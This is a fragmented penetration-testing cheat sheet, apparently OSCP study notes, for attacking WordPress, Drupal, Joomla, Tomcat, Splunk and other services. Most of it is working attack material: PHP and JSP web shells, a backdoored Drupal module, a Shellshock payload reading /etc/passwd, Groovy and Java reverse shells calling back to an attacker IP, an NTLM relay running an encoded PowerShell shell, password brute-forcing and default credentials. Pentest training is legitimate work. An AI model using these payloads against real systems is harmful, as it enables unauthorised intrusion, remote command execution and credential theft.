The best methodology for pentesting services is to usually just search “Pentesting {service name}”
https://github.com/saisathvik1/OSCP-Cheatsheet?tab=readme-ov-file
WPScan
wpscan
and investigate the plugins
wpscan --url http://{IP} --enumerate --plugins-detection aggressive --random-user-agent --api-token {token}
--enumerate
will automatically enumerate plugins, themes, and users, but we can cut it down to something like --enumerate vp,vt,u
[!] This version is out of date
sudo wpscan --password-attack xmlrpc -t {threads_eg_20} -U {username} -P /usr/share/wordlists/rockyou.txt --url {wp_site}
Misc
//{kali_ip}/test
with sudo impacket-ntlmrelayx --no-http-server -smb2support -t {relay_target_IP} -c "powershell -enc {reverse_shell}"
unix/webapp/wp_admin_shell_upload
will do it automaticallygato-x
to enumerate entire organizations
gato-x enum --target {org_name}
GH_TOKEN
environment variable; just add export GH_TOKEN="{token}"
to shell config filenoseyparker
to scan entire organizations for passwords
noseyparker scan --github-org={org_name}
droopescan scan drupal -u {url}
/CHANGELOG.txt
PHP filter
module and Save, allowing embedded php code to be executed<?php system($_GET['cmd']);?>
and set Text format to PHP code, and Save/node/{node_number_eg_3}
wget --no-check-certificate https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz && tar xvzf captcha-8.x-1.2.tar.gz
<?php system($_GET['cmd']);?>
.htaccess
file (as otherwise we won’t be able to directly access the modules folder) with:<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
</IfModule>
tar cvf captcha.tar.gz captcha/
/modules/{backdoored_module}/{php_shell_file}
droopescan scan joomla -u {url}
sudo python2.7 -m pip install urllib3 certifi bs4
python2.7 joomlascan.py -u {url}
/README.txt
, media/system/js/
, administrator/manifests/files/joomla.xml
, or approx at plugins/system/cache/cache.xml
sudo python3 joomla-brute.py -u {url} -w passwords.txt -usr {username}
admin
/administrator
administrator/index.php?option=com_plugins
and disable “Quick Icon - PHP Version Check”system($_GET['cmd']);
/docs/
/conf/tomcat-users.xml
stores user creds and roles, try tomcat/tomcat
or admin/admin
.war
file (tomcat application) to compromise the app/manager/html
and upload the following file, zipped into an archive titled {app_name}.war
<%@ page import="java.util.*,java.io.*"%>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (unix)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>
/{app_name}/cmd.jsp?cmd={command}
multi/http/tomcat_mgr_upload
Tomcat Common Gateway Interface (CGI)
/cgi/
or /cgi-bin
, and we can fuzz them for .cmd, .bat, .py, .perl, .sh
/welcome.bat?&{command}
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' {server}/cgi-bin/access.cgi
smtp-user-enum -M {VRFY/RCPT/EXPN} -U {username_list} -D {domain} -t {ip}
python3 o365spray.py --enum -U {username_list} --domain {domain}
--script smtp-open-relay
will checkswaks --from {from_email} --to {to_email} --header '{header}' --body '{body}' --server {ip}
/script
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/{kali_ip}/{kali_port};cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
String host="{kali_ip}";
int port={kali_port};
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
admin:changeme
or admin:admin/Welcome/Welcome1
.bat
file to run it) and python revshell
inputs.conf
in the directory root, which tells Splunk which scripts to run (run script every 10 seconds):[script://./bin/rev.py]
disabled = 0
interval = 10
sourcetype = shell
[script://.\bin\run.bat]
disabled = 0
sourcetype = shell
interval = 10
tar -czvf {script_name}.tar.gz {script_directory_name}
/en-US/manager/search/apps/local
go to “Install app from file” and start the nc listener{Splunk_root_dir}/etc/deployment-apps
directory on the compromised Splunk machine
prtgadmin:prtgadmin
, and versioning should be in the bottom left, with CVEs associated{ticket_no}@{company}
”/help
for fingerprinting version after being logged in
/users/sign_up
{cf_root_dir}/lib/password.properties
has encrypted passwords in key-value pairs/secret~1/
exists, the server will return 200s for /~s
, /~se
, /~sec
, and so on, until we reach /~secret
/~secret
into /secret~1/
and fuzz the contents within the directory/secret~1/somefi~1.txt
somefile1.txt
would become somefi~1.txt
, and somefileextrastuffhere.txt
would become somefi~2.txt
java -jar iis_shortname_scanner.jar 0 5 http://{server}/
nagiosadmin:PASSW0RD
system:manager
AAR
file with msf module